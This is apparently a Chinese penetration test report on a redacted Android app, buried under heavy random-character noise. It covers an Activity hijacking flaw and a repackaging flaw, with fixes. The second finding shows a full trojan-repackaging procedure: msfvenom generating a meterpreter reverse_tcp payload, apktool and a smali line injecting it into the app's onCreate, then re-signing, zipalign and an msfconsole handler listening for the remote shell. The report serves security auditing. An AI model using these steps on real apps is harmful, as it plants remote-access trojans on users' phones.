! r5 O% Y+ D& E# A6 A1 i1 L3 k3 ]
# F8 `$ T! y: i; L. F
4 ~! W6 ?! B, w2 T3 u+ G- i
% r) l" J/ s" o9 ~+ P. O. ~% u& n4 X7 o' W2 C# a0 D: Z
1 r& j" @" o- P% O0 e' ?
/ a* y: ?9 d D" i, ^' m- Q0 x
( F: h/ u. K2 l5 G5 y, J" Y1 `' H2 C. ?) T- h4 T
9 G* R7 p# [. y# Q0 k4 w
( U, m3 ^ x1 A7 O9 x 0 @, f1 q0 \ e2 \3 X! O0 d
4 B) K; |# Y/ |5 c8 x* ~2 b
表1-2 测试结果 1 F6 Q+ m a0 n3 z" h
* g1 o1 ^, v) N/ ~5 x0 x: k
$ G/ C; |% f% @9 N4 m! n6 Z
) G F5 k. h/ t6 Y7 }5 D/ v& O
8 w, [9 a2 U1 x4 @6 S+ V. ?
% I( V. v. }: J1 s% @; `$ i 2 ], d3 G h% r6 C
. {: g/ N; t' R. a0 C- D1 N1 Z/ w* r( ^
* Y: r7 n) A; H) M" ^) S, b" F6 ]* i" J
- R8 ^ {/ W8 D: `5 m$ t
1 W! a. V0 i8 t4 Y3 L
& y" l& Z- E# T; M4 F0 k 2 检测结果
( R# _* |/ ?1 v! j, j C8 K( f. \% Q4 h! ?
) n9 c, @! g; C; N* o
* ~1 s7 h7 _# \" t) [) _0 L& L+ ]4 } - [/ h. H( m, K% R
$ Z9 J5 }" G9 }# ? _0 p3 M 2.1 某某某
6 R5 D2 ^. z- n3 N. e0 Y
1 t1 I. D/ e# B5 ^
: v6 I- |" H1 R, A1 u0 F5 d
1 Z8 Q( I/ N# f( S
4 X" e. o5 _3 \7 I$ m5 Q+ h3 D- i& _8 w1 ?# W/ Q( s8 t3 B: h
2.1.1检测目标
' s4 w- y* }( D- r* u# G8 ?, e! [& m7 {# a0 L+ o
$ D0 ~! q3 k5 U) p
& j9 r0 b* r4 T% x* V% ]! j' e
w: N/ }7 u7 {- Z2 B6 l
! a d" z! m5 f( b* s# q 目标地址: 某某某某某某APP 7 t, L' {* b' f, n; n' m! ?
6 a2 M9 _( a( N
5 j# L! H5 V X7 N" i& ?4 H
7 x" P4 G: E7 E& W) u, G. s 4 E( T ?* ?: G: L8 P
* U5 s+ K1 M3 T' N1 a 2.1.2检测结果 ; Q9 X# B" a! d7 @
: k5 Q3 U8 N8 L. x P! x1 k
K. _6 `, N U, ^6 L
' c+ I2 F/ j& M' N
0 m2 m6 I; Z( z1 A+ y0 d! H0 o
6 s& ?. ~- |- ^% v2 ` 2.1.2.1 : f# Q7 m) A$ T" ^, ?% k# ?0 T$ y
% T# Y% L# a2 t
0 J' K* v) Q6 S% d' X
: l& t5 }" _# E$ Y
W% h. q0 ]: N, @# E: h
) f" ?% H/ S3 V 漏洞链接地址:某某某某某某APP
3 U6 D6 t4 k9 l, z. w
8 p" K8 q2 m0 v5 a2 W
! @, n, j" f- u" {# q ^3 h, Z0 I4 E# @/ G4 d5 _# g g
' k% k/ Z+ x/ H! u
; r/ k6 {2 a* U5 d% G
Z z8 z& n- P% v2 ?" z4 X2 U
$ h }. D% R# e b& X+ q; p
* l' E, r# M4 q7 Q9 o. m$ D" j S1 ~. d; Y! ?- W5 B/ n! }
' }0 T+ l* d4 Q. e
. t9 I6 U6 o- @! T( ^( ?5 n q 漏洞分析及取证: % t2 Q" R* e4 @! Y" @
I! r$ H5 j/ x
0 Q! C( Y5 k, e4 `" p1 [2 D# m
) m# s) b5 D- I5 m" S9 L + g6 ]: V" m* h5 L3 x1 o9 V
, ]- J5 x. n0 d
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
* V* t. e5 [6 F# C8 O, a0 G0 X
: q9 h9 s7 y: l( d% x9 S. D, Y& g
. D7 S2 y6 d! d4 O! a/ Y6 l
8 M5 O' w) c, J$ m! P, a
+ ^. H% U! {+ U( ^/ h; {& e. r% K D/ e
; {" y M% S0 |' D/ V6 f) ?: n0 h% g' I% Q* b; L F
- p8 r& g P% R. g, P5 p" F3 U8 n, J2 C
& w) n/ k/ N! u; K
* N9 l' J+ p2 x
! q! p! p: h" K$ N1 S/ s
, `' g% Z. R% v4 X" @2 a- w
" ]! Z3 {8 e! S9 H3 K; O
; x" ~ X4 ^. f; g# y% O7 X: k9 @4 u7 ^6 V
+ n: G! I0 b( b+ i: h
: F* _) Q" G# i0 {3 t( O% d! p8 z
5 n8 ^7 Z& R0 N: F5 \/ X9 X% s( h6 B" S
) Y' N- T, }4 m
! j& g: S) h! R+ ^
3 r; k _3 ]# k( q2 c. u2 s; |
, E2 P( K& G* J% `( Y+ l" ?$ H( ^4 ]6 x8 o9 K- Y1 q8 I8 w
- [% @$ j, f! E' g% u/ Z
% L0 d' a5 y' X ?$ H: g9 O
& D: C, |4 q" w
7 y5 }: a, i3 r0 @" K+ o
4 t' Q0 @$ \* F2 J3 I# [# ^0 ~) ]7 `: k# Y7 [& h2 y
G# i* ], o) S/ R
: d c. O# E# {: X+ {, C% q
$ c' O* ]% ?3 b0 j
. b5 t0 C8 A3 v" ]! d$ S8 P# o
* f: ~- O: w( `& R" s% g& B9 S2 [1 v& u+ g0 }& Q( D
漏洞危害:高
6 |/ U) B5 P2 U% L: S6 C& p; f% o: C5 l3 ]) z; c
( Z5 a( R0 I/ _
. D) j6 q, l# B ) b8 @2 h2 N1 @- v( f
* M3 Q D/ W; w. A2 u
" ]: ~' a0 w. S2 ~3 T: G
. v/ M( N4 o0 _$ g f 0 c) ^& K! t9 Q2 u$ Y3 e0 ?' ^
: s' g, {2 d, g, v9 n, b
" y# I E) t2 r$ E2 e' s* P* m
0 A/ e; [1 w& j" l, @$ }: Q5 V
z5 i4 ^) G4 K5 F, `: Z
$ Z- ~8 K w" ]1 e& x1 H: P( I
/ X' Y1 v: e, D. I J* l
严重程度
`; ]# B4 a3 X/ L* y; y
( L# Y) E: e$ a4 P4 E- f- N
: m4 Z1 P( F5 |9 a7 c: t
" F1 h e8 [1 f1 c% Q |
2 [% F0 I) \/ \1 J, P4 ^* F/ W% ^' P3 Q- K3 ? x
& r' V- o6 y8 f. L* G! }2 C1 _) A( A+ p- a: A
$ Q: T" q' f6 x4 {
/ x' f/ F0 N ~8 }4 G! B
高 1 G6 y$ R3 L' g9 B' s* _
. u) S3 z, `, Z0 k4 { 8 q" K2 S0 y! @' ?
- D5 q: I. e" |1 P c: Y, U3 k
|
& p' W7 H7 y7 U
6 o' d8 b" d c% T l ( H, ]3 @9 E5 P9 Y; B: w* b2 j8 b
. H. l9 z" m. {. Q
) _+ ^" ?; e1 @) i
' T9 o5 J3 B# ~( i8 U( e7 X ■ 2 x7 y! s+ E" f& {
; e+ j- Y9 d8 R$ @ M
- u+ M" W, |' K5 x: L! p1 r5 L% y4 k9 A A
| # x" [( e9 R. \, }
9 M7 F& C/ y J# s* X8 u# u
7 x& a+ s9 t2 X; }8 w
' @) R, ?9 H5 a2 u" z
! Y6 A/ m" z" g. C, \% Y; i
. a- e: L+ P( o4 T0 |5 }) |& i 中 * d" J) l; A+ S+ h9 x, ~$ M
; u9 B9 y0 u# A$ |1 b; y$ p
6 x- v6 o3 ?- y2 O) q r; S9 A
7 }+ {2 f* g/ P- y1 B2 e$ {- s0 | |
3 P5 @4 f$ Q. l3 U1 t3 o8 T0 U+ G- x
9 _3 E, _7 f( @0 L2 _; F+ ^2 M
7 N* M' L& |+ X+ `8 v
7 F) f4 c/ o" C- I5 `9 Z# {+ J% ?; h3 t( P; ]
) Q$ d( f# d$ D4 z" c& r
+ j1 d& B- N7 m* J( }2 W
( x+ C+ I* T7 h" G! s' e5 ?
( ]1 ^9 |7 e8 u' I0 p |
2 u5 S9 ^: k9 M1 Z* p6 h$ o
9 }- \# s$ u5 {% i6 D j# Q2 U/ S5 K
+ u7 x- H' L& b* ]; d' z( }
* t; u" E) [9 ?
6 e5 {, u1 z2 h
低
+ q# O! t5 t: o. w t9 \0 B
" r; h s9 R% G) \ 3 y0 F- f. Y) |" Z. I! b
9 n- o5 l0 P4 ?, u0 y4 H9 m9 O) J \" o |
. z) o7 S: |3 ]% r8 ~) V Y0 m- i3 R9 w* I9 i1 s: z
! W8 A$ x- U x
5 Q5 R* Y# }$ [& t. C% Z
1 E+ a. _; ^3 z. I, M3 O, K$ C0 c! n! u3 Y9 s S5 |
" u$ q5 W" A0 S% j5 L
* X1 p% w e* w' O3 ^ c
" G' ~7 Y8 M2 h. Y8 `& ^; d% k K# o! @( r5 X& S
| . X; F/ y& U4 R
# x% L6 [( c/ m5 z% L7 ^9 x3 z
( x( K7 @ }* m9 p4 e
$ s0 U# Z" B/ F/ r1 y- u
& h( y0 b$ D: ]
0 x# I6 R" i, u# ] G7 j
# W$ e0 s5 a/ g! x! w: C x
5 O& Q, m) L7 B+ L9 L
$ t3 {( q# K9 n. {: } K
# n5 W0 ?( f+ [* a . h7 x- ^1 M3 ~- I
3 z8 c5 v; ?2 T6 x d# v4 ]
; E' R5 Q z7 \ j+ o: h
$ u: c2 d, A; q
- x* a. C* u9 z3 Q2 {5 j5 i
% o+ D* z% w% t. A; S) ]: U
$ @% y4 Y( [3 b( r% h* K. W" t8 d4 U* O
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 I p3 U! ~( W1 K8 ]% ]
. F( x; f, K% K% n
- Z8 T( G& b, O) B: H# `+ u3 ?7 o+ @, d! |, w
8 L+ j' A& V# z
0 d9 A$ e: ?1 O' R6 R7 @ - S; W4 I. Z6 V
8 ~/ }! r, a# `9 ]/ r
/ i2 V6 W! m' v$ R7 ^( _* k2 f" b8 }0 @' h" j) @
; N: J9 z1 K4 w
8 h7 z! a4 O4 H0 K$ y9 \ ! D. D7 q8 I. E; ]+ q
5 E. a. a3 S3 G: K- L" Y
% p: I2 `% w& x+ B1 ^: V
% z1 r& z- U% k) t0 ?! K; w+ j1 B1 ^
5 j. q$ q. U" }. Y* ]# s2 v# r0 r
* C' _# _5 c5 } 2.1.2.2
7 j$ }8 x, j5 _5 |; ^0 T4 I
5 c, o! `: K9 u# }- n3 C/ c1 V
# J* E$ o; s: d( p: B1 B/ {
- L" M @+ S2 X( w. b X$ c9 [
) u* B z% f5 N5 ~5 H% j3 y3 ?; k$ ]$ [, c, R0 D) q$ N
漏洞链接地址:某某某某某某APP ; ~/ v* u: z9 \3 c
: ^- s, x* H# C& M
9 ~, Z- h9 ] k* F2 j- C2 e
0 I! ^* T9 `4 R1 K $ W* w- }3 k1 U& _. u: q# d
( t5 C. I3 } q5 g8 y9 t 漏洞分析及取证:
* S7 z$ l. E# g2 _1 a/ i3 D
! u2 s$ D- f# c* \ c; X; _( B f- A
8 }. }& N7 [! F, g% e. T4 t i. Q& h1 I- M. Z6 V
( j! i( y: K% X* G
8 i2 B5 u2 K3 f7 v$ B" a: C2 Q$ q 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
+ z' N! F% p. C! V0 {) S! Y
" g2 l7 I, S: J! S
6 X5 @* G. [% i) f1 _: o
3 q4 H- H' g' t/ b/ }, f/ a+ b
5 y+ n' F. W7 y7 W
' K% d& T3 N! G O$ R/ c! f 用Metasploit 生成木马 apk ) k( P6 |( H6 j: ?5 S! H8 T$ d
% D+ ?5 W# `6 W+ j3 S
; R, a; F: s+ Y6 I$ N- j; J2 d6 ^1 F9 H3 S, F
8 }" R( o3 P& v6 `, y( I$ f6 o9 }' ^- Z H1 @8 g- Y- N8 A
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
" A; ~' R9 Z: y7 ^$ v2 N. i6 r. A7 J9 t
2 H( O5 @( t1 i
7 X% K/ S: x0 x* Y, z- g
/ K( ~# n1 S0 d( K4 s! `$ A) Z8 Z
d6 u( w: p4 C& [: @
反编译目标apk和木马apk
* t1 l/ x5 o& A7 Z* L8 T( C( b
2 b3 U. L2 Y. { y3 _+ J2 v$ j
, h2 P5 V! V. s
5 d( x7 t8 e" T0 @' v' v& P7 k! n 2 { T h( m h1 {
: F% T ]6 A: p apktool d target.apk
2 _0 n( ^( @( H9 E8 |. O% [7 U9 @
8 N8 [ C7 ^! V& E7 {- p apktool d cockhorse.apk ) ]) I- U2 u/ L( d# K/ t0 _0 R d N
% Y% y! U# m _4 M$ W, ~( k
# M8 m- _ W" v t/ k: p. J- R! w2 O" K! b9 \
$ g. z8 s$ L& t) Z5 e4 G8 x" [( B- T# Q8 x) |
木马 apk 注入目标 apk ' y, X7 w: h+ p$ _+ [0 E2 V
: k* G1 z" W' ]; M3 A: F- l; [
$ I$ ]* D$ f% Y/ g7 u2 M3 l
4 p& Y/ m( g$ K' ~
' M( u7 D' g) q8 c4 v* k% a1 S$ f, r( a
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
0 B" G6 O7 V& E9 J: B; h
" t* E& h% m6 a3 N K invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
& q, y; F1 T6 U/ N0 z1 P8 a( a$ @) a3 i. ^: W# w n
7 A1 J, K A; }; _8 ?. c' F0 I: L1 U) c
6 |7 n$ g9 v4 Z- I
. s) V c# f4 H* }. Y4 |+ _$ P* u. r- e( c: ~6 d7 |
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 - c+ |+ f V* H K6 W
" H" }2 W6 Q% k, C$ l
x0 l- v+ u2 @" `" u6 x6 z
% M& L1 W( ^5 h$ x9 U , q4 O; G! N$ K& y$ l9 ?! m% {& B
0 i4 L2 Q- M' H
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 $ m0 J! l! T& Z: a
& o% K7 k2 L9 p- o" A& r3 _
9 t; K( @& B6 l/ G9 ~* Q0 ~
4 ]% [# Y0 `& b 3 N; i4 M: K. Z! Z8 Y# x
- R: Q J' _* d! a$ e2 h
回编译生成最终 apk
% W$ R! G6 {! z8 z* {% C4 n' t# R4 N5 k' W7 C
/ Y. L# c" g" ~5 A
0 @( T) t9 X2 A$ [6 z
# }( R' T& |" A7 P0 ?( s$ A
; I4 ? H7 C% c 重新打包
5 m) K( [6 r1 E4 I9 e% g- M1 _# v/ n% B d+ ?0 P7 A7 o+ b# {0 R) i1 p
I _1 o3 W6 S8 w. Z3 r
' F2 h$ O4 d ], g. y6 h6 h
1 R5 K# M: R# F" {+ d$ H8 |: C0 ]7 q7 C7 k! D( Z* Q! Z5 b) f; ]
apktool b -o repackage.apk target_app_floder
% c% z, v; W# S O7 H5 r
, y: ?: J- A1 M( x( J# V+ i
7 x. P' ~0 B8 y: f+ h. s
) G" y7 ^! Y5 s' R, d$ u : V3 ~# K B+ R* ]
( j; u4 e: J: p# S, w7 V
创建签名文件,有的话可忽略此步骤
E2 c) {5 ]4 d0 I5 {0 B1 I9 u7 z# a/ r4 V4 |. h- D d3 J
% K! J4 S( _2 D: v3 [2 d
) K, w: z1 o' o; g7 S ( w7 d& r) J P q- _
% D- `$ `5 N% e. e" G7 W/ d
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 4 V3 K7 k T' ]- a) W% n. {
) Q5 h, H( f. X; _: A7 F
4 z% R! V# S6 A! B/ k. K
4 M& t& c6 a' O ?1 |8 A 1 f r0 x A$ n+ H, I: W/ z/ `* {
) ~, ^& {8 E! y+ U1 Z 签名,以下任选其一 J4 H, K) K( f
6 O) A) f; Y# E6 Z6 C. S
. z9 w) v! ]! d
9 J" G$ _) L$ A7 O. b 8 B* M9 P8 A: Y8 ?
Q. S4 N# e. L) o% E jarsigner 方式
# ]& D, D3 M& R5 b! P* e# z+ R* r, C
8 ~* H# U v& h" m9 }. n1 K* }
! i* X1 s: H3 j2 Y+ m C5 I1 [ ( |1 T5 W0 Z* I
; [' |9 |# ]9 e0 r
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
1 v& t/ Q- T2 f" B/ a5 p% ?
' g1 K: S/ K$ B% D5 w$ J: ?. P X
- o& T" q- s- h: e2 u$ P
( S4 @2 `3 A1 K* w
# Z6 n1 N. ~6 i5 v
$ k/ r4 O( o- p6 v: ^& f) }# k apksigner 方式
9 u" M* ?; q, ^- l- o# e) \- k; r% S6 l7 J
5 E; S' R% K2 ~! q% j
P1 I& A5 `1 H6 q
: ^/ X5 u8 s3 X( \* _3 l3 P( H9 ~+ U8 G% s3 r
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 `0 } v# ~3 I2 r$ C) q, k6 L
) K- l4 [! w1 x4 a G: } O/ ?
' t& ]' ^$ H& H7 j+ z
2 b0 B8 s9 y% |9 }! ]$ u
/ L0 D9 q; }# E" n8 f3 l: u( k& @6 q
如需要禁用 v2签名 添加选项--v2-signing-enabled false
% A# U) U; x, m9 M: i- i8 a* ^+ z' F6 a9 Y$ ]2 l, ]' t
3 B) I3 p( H8 R4 ~) q+ P
' V0 z9 y c! n7 i- `+ @
+ u8 ^+ N/ P1 h6 o! @
( K+ b N8 [4 R! y5 ?) j% A 验证,以下任选其一 % ^& C c8 w- r+ \; D0 C
~3 j1 N5 ~& ^
* {# ]1 k; y/ o0 ~' ^
" g* L1 P3 w5 |, j _: u } ; R3 g8 p$ a T7 ^( k; Z( T
& {; E+ Y) G& o" I2 I
jarsigner方式 ' Q/ i' K4 T1 u. S- P' o9 M
( ^5 f& t" S+ e9 N
$ U! K# R0 C' |" Y
* g# E$ s$ \: j* P: Z+ f6 Z2 b3 c
- U# E* [" d2 V, H$ g0 z! Y( [
5 g$ b2 l. E9 P4 j! e% c
jarsigner -verify repackaged.apk
) r" [* m# Q8 b" l5 D. _
9 F$ e. p7 ^6 s- Z1 Y' A5 Y
9 G; s) y0 T& {( P& | e8 O
% |( }$ _% k0 I
, J0 x1 T! M3 _( d' u- m
* E2 c, L+ O L' x$ C
apksigner 方式
9 N3 `! h) b& j
. ^# D+ \0 z( C' P, g. q9 u6 x9 p
. i' ^6 o, Y1 Q2 R
) I0 d* w( x# E. V2 i1 n2 w1 H! X7 C
6 H0 e, S/ J- P: L/ X4 N0 y- i: h: F. E4 D$ y A1 }* o* ]0 E( l) p
apksigner verify -v --print-certs repackaged.apk " ~$ u0 }+ c% B
+ a! j: V6 P* {' h; }: c7 O& y( o! b
8 \% }& L0 j) u4 E Z1 H( k/ Y6 ~% \# [- h
. P# h9 Q1 f( O' `6 I% N! i+ l7 M! k, u, q& M: p* R
keytool方式 : S6 e0 V5 e, C1 @1 D
* @6 [8 D% z3 f4 p- n3 v
: q# G( ?0 z" p8 r; ]
2 R1 p$ w" @6 u8 q : C: ?- _4 |, K G
. v: m$ [5 y0 I; b h0 j: G
keytool -printcert -jarfile repackaged.apk % J9 I. V, |/ E
6 l9 q& m2 N, o1 @1 |* k5 Z8 }; m
7 ^$ Z- H. h& H& j0 l
. h5 t# k2 [9 }
% |# A- | D# r! G& C2 g3 E: r: ]1 g+ @4 A) M9 |6 ]/ S
对齐 0 H, C: O h# r5 y- R. Z. q
3 P2 \. Y" @, H$ v8 c$ m+ w6 Z
) |# J; h# ^0 l2 o
" C5 @/ x% F: \ h4 _: I
3 U7 p$ V; R$ e6 ~" H
" U! j% {6 X( Y0 ~ 字节对齐优化 1 M' J6 z( I( [) l1 \3 Z$ V
. Y/ }8 \: m5 z* |" E* O4 g
$ J5 S, l3 _, y7 p% F: w, ?- M
% F/ p @8 Y' _# { G- Y. x/ a' i
3 \( ^* |" P* n* n$ r! p: f# Z& C
5 J9 a' K+ G' x+ l
zipalign -v 4 repackaged.apk final.apk 6 ~' V: H# g1 [: H: u3 t- }- w; M% ]
1 C* L% |; N" v8 E! Z6 h" m
l9 ~+ i0 o5 e8 x" o& r, J5 q, \
* _5 V- T" U9 v% N) C; q
" a! U: G* e# X
- q9 j4 w2 Y* u% `, Y# a2 P 检查是否对齐
+ X4 d' p& z1 q
?; }/ S) F% ^% G* O
. X8 L6 c: a) \' ^
: _+ D2 P6 K/ c1 {3 [: A
2 j( E& e- Q! e0 h/ V; a9 \0 e7 M1 m5 M
zipalign -c -v 4 final.apk % @5 R! Y( Y% M$ {9 `! r
2 k: h: G( R7 F0 F
; W# v b) a8 g7 y, ^ p/ O P. v" |/ h1 {# C8 g$ X* F; k, X P
# ^! {$ `+ ^0 w' o. A: S9 `# A
6 p, W6 O, E9 v 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
0 H; m/ `$ Z. L0 u; Y3 I3 y# \, |8 `1 o, V
2 b3 ^( ^+ u5 S+ x4 _9 L
# O( ] M4 a" U, E7 M7 z, p" _
' [% \0 z( d" a% Z) p0 X; B
. O' q3 j3 q# r( L5 r" E* W 启动Metasploit控制台,配置参数等待上线 * f. W# I( w9 v- Q* [
" q% e6 L+ S9 f) O% c
& _% B+ \, s) p5 S4 z2 i) H
; x" }- V1 |! w' H% m# [
2 n6 G3 w9 Q: w$ \/ R% y! u
: c1 w" M& `' j- C; A 在终端依次输入如下命令
- G3 L) l' B! y% ?2 s v: ^& S, n/ Z; x+ K# q. @7 F8 q2 s
" i& u# ^0 H3 Y" [9 Y
% F! |5 r) X) i) [1 [4 |
, F7 ? ~( N& N$ @9 P+ Q4 C9 O) G, f# V
msfconsole , r' O/ O- F$ R( C# l0 }
, T! h9 Y$ F6 M6 [
% O* ^3 L% x" ^7 q7 u6 b" a
9 e" k0 Z$ r" t- g8 A+ ^
$ m+ C, Z$ Y7 T0 K# b4 K
5 a H: Z* R8 c+ t# F" W( f use exploit/multi/handler
2 N. E1 q4 F$ K4 T0 V5 {+ Q6 x& g0 Q0 l& T( h
' ]( |. C! I/ j! h# C) |. k( M/ d6 Q, S9 X$ o- r3 C1 p9 @& H" T
. Z' m2 r! N) W& c I* l5 q
/ u" C6 v- c/ s3 ` set PAYLOAD android/meterpreter/reverse_tcp
$ A: f/ g6 r' a$ Y# Q# j! Q9 C. n5 G7 Y, U1 h% Z8 I( ~
% o" ?6 P G. W( a( ^( x4 z# b; U2 ]/ v4 e) V. _* L' Q
* |7 B2 ?2 r! E- t" s& h
( b( q- @! o8 Y8 [ set LHOST 192.xxx.xx.xx
& c# d+ W% y- @. m. b: ?1 j$ T' q% W4 I, B9 D" l7 |
+ S3 E! s# H) k6 ?6 X2 n) ]
. q- O$ d* x$ Q J3 ]! P" K5 f% `
2 l: ~' c" h: K) ~$ r# P/ {& b7 R) ^: O$ y( D* K6 J' Z# I
set LPORT 4444
: A: R" W6 w+ j% u" h a
# ^ q5 ^: \; e2 b4 O3 [" }
& }" h; `5 x/ c' m
$ \6 W& q* g( V0 Q ) G3 Z3 Y. g# ]; ^
& {+ ] t; T$ q7 o! O# l
exploit
& p D4 G! G& M- x$ c* @5 d) v, r1 Q7 l% n) R
% g; s' c' S5 \) f. m% k3 a
6 v6 w% R, D: j9 S3 \6 ?
0 ]6 f* ~3 U9 W+ P) w8 `! g
; f% L, C7 r' j& v) _
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
4 c. G O- A' I8 x8 Q+ L7 W0 h1 W. q
" L, w5 Q- B# Y8 Y- \
: S! I0 b( r. h- u
$ F/ d+ z( b. B+ S. x) A- e: n# _& n
漏洞危害:中
& b" V8 n! H" K/ V8 |( B! [
/ ^. _, Y& g* s" o4 T* q/ L
3 c i3 T O; _: G1 A \, y) O! U) |$ V
- p: {6 F. E6 ^0 h* i
* l% [" C0 }6 h3 S" u. h e+ c
; ^" Z+ D5 {8 \2 u
' E" C0 O7 M7 |* n5 \
! H5 I7 W, d5 Z- A; e4 t% j6 I' H) m# e/ C8 c$ I: R# j8 e( Z
: G" f2 {, W) J' a& u/ q
9 c/ c6 `8 Q4 a# I6 }
/ l' w# G- T# P& i/ ?$ c9 J! Y3 g5 n( P0 e
1 M/ S+ {: f. I: L( b" l1 _" l% }/ S7 J$ f% d# I3 A {
4 n1 @2 U9 X6 ~! p" U; P: N& _4 p/ X7 g5 p& s
严重程度 ; q# B- {" V; H9 N' w3 q2 I
4 ?8 v8 a8 C! N
" v `1 \" C" D: u2 x6 [# l, Z
- P$ u7 x8 F; H1 o. z- g" c* ]0 T! e |
* w; j/ h& r1 N3 o( N9 q d' C0 k- N% `
5 A4 X+ t% U2 Y
. x' ]/ b8 G4 n/ T 1 |1 J& `; W+ G" l
' u6 }$ U2 V" w/ S" y. G, ~; {# X 高
1 h: Y3 S/ [) F9 @* v$ y
+ M, ]- j8 F- G( u5 F( X5 j: J
* G# m4 K- w$ B, A" }3 f/ z, y; S2 X* |) s4 j" W e1 ^
|
: _" [' D( |/ u" t/ {9 V% M1 I* I: w
7 k4 O2 Z' i2 W9 l- x! O: h8 ~# W
3 d- ?% Q3 A0 ]. D, C
5 x4 `7 V3 N* ^
2 v9 L0 z4 a) A: s! r# _0 s ■ ) `! k6 [# {2 h9 O0 |" k6 V
5 B$ S, b( E. v! i6 k) f& _2 g
5 ~( k' d" n3 W* h; ]" l) }; `/ ]
9 z9 Z& X! G; c4 Y4 a! ` |
; ~( f) @/ P! s0 a) d# D9 C( Z+ L7 t8 m0 C* C6 G
" A6 T# }; \3 p* V4 V/ k8 I& m
8 }/ b+ Z( b" s, R- s& y' p7 ]' | % Z8 l! ^ j" e. V
& U% Q6 W0 `( q% p1 j T
中
" U/ A" D" i# F
$ R* M9 ~8 K g0 K# B9 ]1 I; e% o! Z
$ r$ X, } I3 Y7 |( q n7 ]7 h8 H' b1 B9 K# C
|
- M8 n D/ G* j
9 V3 b# \8 t2 [ 8 \0 V3 E# V; b/ [+ `
1 {! _+ q: T% f% y/ K2 [0 z
7 B8 _; X2 D" z [ v, A
, e9 N/ v7 X* g/ h
7 i7 Y& [# x1 \2 _0 `
" d; |- ^0 m* M, w% i- q # f* x/ L+ R k3 ?
# V; Z5 @8 X& X: z; m
: K* y4 O9 B( E) N/ N/ b8 c
: p; T+ Z, w+ B; b5 g. G- Z |
; s) A& y% E' u3 w/ K6 @6 U8 G! u3 p! W/ ?$ s
0 m5 Q x0 g1 g4 c0 ?4 s# @: }% p1 I. Q+ I2 {
$ C2 e$ V& ~7 h3 `/ ^4 l
- J% B7 u) U) q! F9 t; ^* f 低 4 {, g5 z8 E- }( I: C1 p1 a8 c0 _
% [" C; a4 |3 [4 p0 q/ m % C* V. F- R+ [9 o/ c1 D/ Z; ^
Q9 v3 f* N7 L4 Y% X2 k9 Y | - X% v5 {3 e/ G6 K8 B/ Z
5 ^ ~& S. @, b* N6 o9 [$ q3 n
$ b3 n- j- ?$ J( B; W2 i
# P% z z- K9 i; \: q$ u+ A: H% L0 N 0 u) C6 Z5 ?! N4 M
0 C) C# H y2 t- @: V% V" y
! r& ]: G! Z# E4 ?
3 M* W/ ]- o7 d+ Y& M" N1 \# g , u+ q" K+ A5 C/ f
! _, y: |1 N* m1 Z
. j+ `2 b4 ~" t
( A# n4 {* D. h |
* I) z& n ]* L; ]( E0 ?# L
( g! c7 j6 K( N9 o4 Q
8 n. O4 O; c" r
6 R7 h& [4 J2 X1 w I8 Y( E) ]+ ~8 T
% Q2 a2 U& {* q
0 {7 K5 J+ o+ Z: ^
2 t1 V# N2 o) b- E8 F3 @ # n6 |. l- d8 f4 d
2 Q. ]' J8 z j+ d$ |7 [5 u ; K1 F! @7 h" s- t: s
( D9 t* V S5 f6 e+ v ( ~; b: R0 a, @+ [* s: d
1 e s s$ J0 Q$ I* i: J! V
0 b3 U+ C. p4 y. w9 ]' @1 Z8 `+ W
1 j' b/ x# x1 M5 F/ t+ p) ^
6 H4 x+ w# U4 Q. V. I* U- W6 ?8 f' h" z
修复方法: ) w# L5 P. U$ a/ c5 m, t
/ h" q9 f8 d' i6 [) I: A, w5 P
+ i7 C( Q F4 m- S
( l) B) m, o5 B. j. q$ m0 B! G
8 Z) k2 B( q3 w5 h
) t# v% {' c0 ^; _0 ?9 ^ 1.在 APP 启动时应做签名校验防止二次打包。
4 c6 S1 M5 B( O. f; X6 m
! m0 K* o% l( [3 k' `4 l( l+ r 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + w" |+ m; m2 U) \. R
% x7 B5 p( N* C2 f0 g
8 F" ]( d( z; p8 w) r& a$ g
9 s: r8 O* c. S9 \" O 3 G3 P$ u, ?* k$ Y- P9 ^6 W
4 z- V! o" C+ f; s7 _6 Q6 m8 m
0 q4 ~; w& S; S N4 ~6 [+ [4 ]' z6 O) v$ C$ \) \; [( h8 V
0 W2 f& y! z% o: d" F. H/ ]! I
: E0 S/ ^% _) C# F- m5 r
' R) e9 M2 O4 D1 J
4 L7 e: u% D% T* X6 ^3 @ $ r6 F# ]2 A' K# X+ |+ @# B9 l
) k, V7 R% s% E$ c4 t/ N/ R0 z
% c F4 W& ?" N* s. z5 s
! c0 X1 p& e; H2 v3 F
, [- @6 P- d/ O4 i3 [/ y* }8 d2 X% x2 {4 L$ s
# z6 t" d3 D2 R8 D0 \
( {1 ]4 J, _3 p